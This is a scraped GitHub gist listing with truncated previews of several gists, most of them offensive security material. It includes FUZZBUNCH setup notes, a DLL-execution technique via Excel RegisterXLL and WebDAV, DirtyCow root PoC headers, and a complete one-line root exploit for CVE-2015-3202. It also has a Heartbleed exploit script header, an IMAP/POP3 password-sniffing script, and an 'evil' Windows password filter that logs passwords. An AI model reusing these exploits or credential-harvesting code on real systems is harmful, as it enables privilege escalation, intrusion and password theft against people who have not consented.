Skip to content

Instantly share code, notes, and snippets.

View ACGT's full-sized avatar

ACGT

8 followers · 18 following
View GitHub Profile
@colemickens
colemickens / amiibo-emulation-with-linux-vm.md
Last active February 3, 2025 12:58
amiibo-emulation-with-linux-vm.md

Easy Amiibo Emulation - https://bit.ly/2z0m09k

(^ that's a short-link to this page, so you can open it in Linux)

Some users are discussing this guide in #hacking on the JoyConDroid Discord: https://discord.gg/SQNEx9v.

DO NOT ask for, or share links to, Amiibo bins in the comments! They will be removed. Thank you for understanding.

(Windows|Linux PC) + JoyControl + Bluetooth = AMIIBO EMULATION

@thomhastings
thomhastings / INSTALL.md
Last active September 29, 2022 05:33

Notes on Shadow Brokers EQGRP-LiT

credit: @GossiTheDog: "If you want to setup FUZZBUNCH (the Equation exploit framework) you need Win7 VM + Python 2.6 + Pywin 2.6, then python fb.py for shell"
h/t @x0rz @DEYCrypt @hackerfantastic

HOW 2 SETUP + INSTALL FUZZBUNCH & DANDERSPRITZ

context: https://steemit.com/shadowbrokers/@theshadowbrokers/lost-in-translation
writeup: https://www.trustedsec.com/blog/equation-group-dump-analysis-full-rce-win7-fully-patched-cobalt-strike/
decrypted files: https://github.com/x0rz/EQGRP_Lost_in_Translation

@ryhanson
ryhanson / ExcelXLL.md
Last active November 8, 2024 14:51
Execute a DLL via .xll files and the Excel.Application object's RegisterXLL() method

DLL Execution via Excel.Application RegisterXLL() method

A DLL can be loaded and executed via Excel by initializing the Excel.Application COM object and passing a DLL to the RegisterXLL method. The DLL path does not need to be local, it can also be a UNC path that points to a remote WebDAV server.

When delivering via WebDAV, it should be noted that the DLL is still written to disk but the dropped file is not the one loaded in to the process. This is the case for any file downloaded via WebDAV, and they are stored at: C:\Windows\ServiceProfiles\LocalService\AppData\Local\Temp\TfsStore\Tfs_DAV\.

The RegisterXLL function expects an XLL add-in which is essentially a specially crafted DLL with specific exports. More info on XLL's can be found on MSDN

The XLL can also be executed by double-clicking the .xll file, however there is a security warning. @rxwx has more notes on this here inc

@joshuaskorich
joshuaskorich / cowroot.c
Last active June 12, 2024 22:19 — forked from rverton/cowroot.c
CVE-2016-5195 (DirtyCow) Local Root PoC
/*
* (un)comment correct payload first (x86 or x64)!
*
* $ gcc cowroot.c -o cowroot -pthread
* $ ./cowroot
* DirtyCow root privilege escalation
* Backing up /usr/bin/passwd.. to /tmp/bak
* Size of binary: 57048
* Racing, this may take a while..
* /usr/bin/passwd overwritten
@rverton
rverton / cowroot.c
Created October 21, 2016 14:06
CVE-2016-5195 (DirtyCow) Local Root PoC
/*
* (un)comment correct payload first (x86 or x64)!
*
* $ gcc cowroot.c -o cowroot -pthread
* $ ./cowroot
* DirtyCow root privilege escalation
* Backing up /usr/bin/passwd.. to /tmp/bak
* Size of binary: 57048
* Racing, this may take a while..
* /usr/bin/passwd overwritten
@taviso
taviso / CVE-2015-3202
Created May 21, 2015 12:52
Making a demo exploit for CVE-2015-3202 on Ubuntu fit in a tweet.
# Making a demo exploit for CVE-2015-3202 on Ubuntu fit in a tweet.
12345678901234567890123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890
a=/tmp/.$$;b=chmod\ u+sx;echo $b /bin/sh>$a;$b $a;a+=\;$a;mkdir -p $a;LIBMOUNT_MTAB=/etc/$0.$0rc _FUSE_COMMFD=0 fusermount $a #CVE-2015-3202
# Here's how it works, $a holds the name of a shellscript to be executed as
# root.
a=/tmp/.$$;
# $b is used twice, first to build the contents of shellscript $a, and then as
@eelsivart
eelsivart / heartbleed.py
Last active March 15, 2025 17:07 — forked from sh1n0b1/ssltest.py
Heartbleed (CVE-2014-0160) Test & Exploit Python Script
#!/usr/bin/python
# Modified by Travis Lee
# Last Updated: 4/21/14
# Version 1.16
#
# -changed output to display text only instead of hexdump and made it easier to read
# -added option to specify number of times to connect to server (to get more data)
# -added option to send STARTTLS command for use with SMTP/POP/IMAP/FTP/etc...
# -added option to specify an input file of multiple hosts, line delimited, with or without a port specified (host:port)
@brad-jones
brad-jones / get-passwords.php
Created February 24, 2014 05:48
IMAP/POP3 Password Recovery
<?php
// Read in the users to find passwords for.
$users = array();
foreach (file('users-to-find.txt') as $line)
{
$users[] = trim($line);
}
// Create the tcpdump command to search for all pop3 and imap login traffic
@mubix
mubix / evilpassfilter.cpp
Created September 10, 2013 19:24
Evil "Password Filter"
#include <windows.h>
#include <stdio.h>
#include <WinInet.h>
#include <ntsecapi.h>
void writeToLog(const char* szString)
{
FILE* pFile = fopen("c:\\windows\\temp\\logFile.txt", "a+");
if (NULL == pFile)
{
@blueandhack
blueandhack / BanIP.php
Created August 10, 2013 07:27
屏蔽某个地区IP
<?php
header("Content-type: text/html; charset=utf-8");
$verification = '安徽省';//需要屏蔽省份的IP
$ip = $_SERVER['REMOTE_ADDR'];//获取访客IP
$antecedents = $_SERVER['HTTP_REFERER'];//访客来路地址
$result = file_get_contents("http://ip.taobao.com/service/getIpInfo.php?ip=".$ip);
$address = json_decode($result,true);
//判断访客是否属于广东省,是否来自百度,是否来自谷歌
if($address['data']['region'] == $verification && strpos($antecedents, 'baidu') === false && strpos($antecedents, 'google') === false){